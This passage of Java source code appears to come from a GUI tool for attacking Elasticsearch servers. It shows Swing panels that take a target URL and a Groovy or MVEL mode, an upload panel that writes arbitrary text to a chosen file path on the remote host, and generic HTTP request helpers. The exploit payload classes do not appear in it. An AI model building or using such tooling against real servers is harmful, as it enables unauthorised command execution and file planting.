fileViewPanel.setReqestUrl(urlJTextField.getText().trim()); 82 | fileViewPanel.setVersion(Version.valueOf(versionJcomboBox.getSelectedItem().toString())); 83 | } 84 | }); 85 | 86 | this.addFocusListener(new FocusAdapter() { 87 | @Override 88 | public void focusLost(FocusEvent e) { 89 | super.focusLost(e); 90 | 91 | cmdPanel.setReqestUrl(urlJTextField.getText().trim()); 92 | cmdPanel.setVersion(Version.valueOf(versionJcomboBox.getSelectedItem().toString())); 93 | 94 | uploadPanel.setReqestUrl(urlJTextField.getText().trim()); 95 | uploadPanel.setVersion(Version.valueOf(versionJcomboBox.getSelectedItem().toString())); 96 | 97 | fileViewPanel.setReqestUrl(urlJTextField.getText().trim()); 98 | fileViewPanel.setVersion(Version.valueOf(versionJcomboBox.getSelectedItem().toString())); 99 | } 100 | }); 101 | 102 | 103 | GroupLayout groupLayout = new GroupLayout(getContentPane()); 104 | groupLayout.setHorizontalGroup( 105 | groupLayout.createParallelGroup(Alignment.LEADING) 106 | .addGroup(groupLayout.createSequentialGroup() 107 | .addContainerGap() 108 | .addComponent(urlJLabel) 109 | .addPreferredGap(ComponentPlacement.UNRELATED) 110 | .addComponent(urlJTextField, GroupLayout.DEFAULT_SIZE, 452, Short.MAX_VALUE) 111 | .addPreferredGap(ComponentPlacement.RELATED) 112 | .addComponent(versionJcomboBox, GroupLayout.PREFERRED_SIZE, 80, GroupLayout.PREFERRED_SIZE) 113 | .addGap(10)) 114 | .addComponent(tabbedPane, GroupLayout.DEFAULT_SIZE, 584, Short.MAX_VALUE) 115 | ); 116 | groupLayout.setVerticalGroup( 117 | groupLayout.createParallelGroup(Alignment.LEADING) 118 | .addGroup(groupLayout.createSequentialGroup() 119 | .addContainerGap() 120 | .addGroup(groupLayout.createParallelGroup(Alignment.LEADING) 121 | .addGroup(groupLayout.createParallelGroup(Alignment.BASELINE) 122 | .addComponent(urlJLabel) 123 | .addComponent(urlJTextField, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)) 124 | .addComponent(versionJcomboBox, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)) 125 | .addPreferredGap(ComponentPlacement.RELATED) 126 | .addComponent(tabbedPane, GroupLayout.DEFAULT_SIZE, 385, Short.MAX_VALUE)) 127 | ); 128 | getContentPane().setLayout(groupLayout); 129 | 130 | } 131 | } 132 | -------------------------------------------------------------------------------- /src/org/vti/ui/UploadPanel.java: -------------------------------------------------------------------------------- 1 | package org.vti.ui; 2 | 3 | import java.awt.event.ActionEvent; 4 | import java.awt.event.ActionListener; 5 | 6 | import javax.swing.JButton; 7 | import javax.swing.JLabel; 8 | import javax.swing.JOptionPane; 9 | import javax.swing.JPanel; 10 | import javax.swing.GroupLayout; 11 | import javax.swing.JScrollPane; 12 | import javax.swing.JTextField; 13 | import javax.swing.JTextPane; 14 | import javax.swing.GroupLayout.Alignment; 15 | import javax.swing.LayoutStyle.ComponentPlacement; 16 | 17 | import org.vti.enumeration.Version; 18 | import org.vti.service.MyService; 19 | import org.vti.service.impl.ESGroovyServiceImpl; 20 | import org.vti.service.impl.ESMvelServiceImp; 21 | 22 | 23 | public class UploadPanel extends JPanel implements ActionListener{ 24 | 25 | private static final long serialVersionUID = 1L; 26 | 27 | private JTextField pathJTextField; 28 | private JButton uploadJButton; 29 | private JTextPane textPane; 30 | 31 | private String host; 32 | private Version version; 33 | 34 | 35 | public UploadPanel() { 36 | setSize(600,460); 37 | setVisible(true); 38 | 39 | JLabel cmdJLabel = new JLabel("PATH"); 40 | 41 | pathJTextField = new JTextField("/tmp/file.txt"); 42 | pathJTextField.setColumns(10); 43 | 44 | uploadJButton = new JButton("上传"); 45 | uploadJButton.addActionListener(this); 46 | 47 | textPane = new JTextPane(); 48 | 49 | JScrollPane scrollPane=new JScrollPane(textPane); 50 | 51 | GroupLayout groupLayout = new GroupLayout(this); 52 | groupLayout.setHorizontalGroup( 53 | groupLayout.createParallelGroup(Alignment.LEADING) 54 | .addGroup(groupLayout.createSequentialGroup() 55 | .addContainerGap() 56 | .addGroup(groupLayout.createParallelGroup(Alignment.LEADING) 57 | .addComponent(scrollPane, Alignment.TRAILING, GroupLayout.DEFAULT_SIZE, 580, Short.MAX_VALUE) 58 | .addGroup(groupLayout.createSequentialGroup() 59 | .addComponent(cmdJLabel) 60 | .addPreferredGap(ComponentPlacement.UNRELATED) 61 | .addComponent(pathJTextField, GroupLayout.DEFAULT_SIZE, 470, Short.MAX_VALUE) 62 | .addGap(20) 63 | .addComponent(uploadJButton, GroupLayout.PREFERRED_SIZE, 60, GroupLayout.PREFERRED_SIZE))) 64 | .addContainerGap()) 65 | ); 66 | groupLayout.setVerticalGroup( 67 | groupLayout.createParallelGroup(Alignment.LEADING) 68 | .addGroup(groupLayout.createSequentialGroup() 69 | .addContainerGap() 70 | .addGroup(groupLayout.createParallelGroup(Alignment.BASELINE) 71 | .addComponent(cmdJLabel) 72 | .addComponent(pathJTextField, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE) 73 | .addComponent(uploadJButton)) 74 | .addGap(10) 75 | .addComponent(scrollPane, GroupLayout.DEFAULT_SIZE, 410, Short.MAX_VALUE) 76 | .addContainerGap()) 77 | ); 78 | setLayout(groupLayout); 79 | setVisible(true); 80 | 81 | 82 | } 83 | 84 | @Override 85 | public void actionPerformed(ActionEvent e) { 86 | 87 | if (e.getSource()==uploadJButton) { 88 | new Thread(new Runnable() { 89 | @Override 90 | public void run() { 91 | request(); 92 | } 93 | }).start(); 94 | } 95 | } 96 | 97 | private void request(){ 98 | try { 99 | String path=pathJTextField.getText().trim(); 100 | if (host!=null&&path.length()>0) { 101 | 102 | MyService service=null; 103 | 104 | if (version.equals(Version.Groovy)) { 105 | service=new ESGroovyServiceImpl(); 106 | }else { 107 | service=new ESMvelServiceImp(); 108 | } 109 | 110 | boolean flag= service.doUpload(host, path, textPane.getText()); 111 | 112 | if (flag) { 113 | JOptionPane.showMessageDialog(this, "恭喜你,上传成功!","消息", JOptionPane.INFORMATION_MESSAGE); 114 | }else { 115 | JOptionPane.showMessageDialog(this, "对不起,上传失败!", "消息", JOptionPane.ERROR_MESSAGE); 116 | } 117 | 118 | }else { 119 | JOptionPane.showMessageDialog(this, "请输入文件路径"); 120 | } 121 | } catch (Exception exp) { 122 | exp.printStackTrace(); 123 | JOptionPane.showMessageDialog(this, "对不起,上传失败!", "消息", JOptionPane.ERROR_MESSAGE); 124 | } 125 | } 126 | 127 | public void setReqestUrl(String host){ 128 | this.host=host; 129 | } 130 | 131 | public void setVersion(Version version){ 132 | this.version=version; 133 | } 134 | } 135 | -------------------------------------------------------------------------------- /src/org/vti/util/RequestUtil.java: -------------------------------------------------------------------------------- 1 | package org.vti.util; 2 | 3 | import java.io.BufferedReader; 4 | import java.io.InputStreamReader; 5 | import java.net.HttpURLConnection; 6 | import java.net.URL; 7 | 8 | public class RequestUtil { 9 | 10 | public String doGetRequest(String uri) throws Exception{ 11 | 12 | URL url=new URL(uri); 13 | 14 | HttpURLConnection conn=(HttpURLConnection) url.openConnection(); 15 | 16 | conn.setReadTimeout(10*60*1000); 17 | conn.setReadTimeout(10*60*1000); 18 | 19 | BufferedReader reader=new BufferedReader(new InputStreamReader(conn.getInputStream())); 20 | 21 | StringBuffer buffer=new StringBuffer(); 22 | String str=""; 23 | while ((str=reader.readLine())!=null) { 24 | buffer.append(str); 25 | } 26 | reader.close(); 27 | return buffer.toString(); 28 | } 29 | 30 | public String doPostRequest(String uri,String pram) throws Exception{ 31 | 32 | URL url=new URL(uri); 33 | 34 | HttpURLConnection conn=(HttpURLConnection) url.openConnection(); 35 | 36 | conn.setRequestMethod("POST"); 37 | conn.setReadTimeout(10*60*1000); 38 | conn.setReadTimeout(10*60*1000); 39 | 40 | conn.setDoOutput(true); 41 | conn.setDoInput(true); 42 | 43 | conn.getOutputStream().write(pram.getBytes()); 44 | conn.getOutputStream().flush(); 45 | conn.getOutputStream().close(); 46 | 47 | StringBuffer buffer=new StringBuffer(); 48 | 49 | BufferedReader reader=new BufferedReader( new InputStreamReader(conn.getInputStream())); 50 | 51 | String content=""; 52 | 53 | while ((content=reader.readLine())!=null) { 54 | buffer.append(content); 55 | } 56 | 57 | return buffer.toString(); 58 | } 59 | 60 | } 61 | --------------------------------------------------------------------------------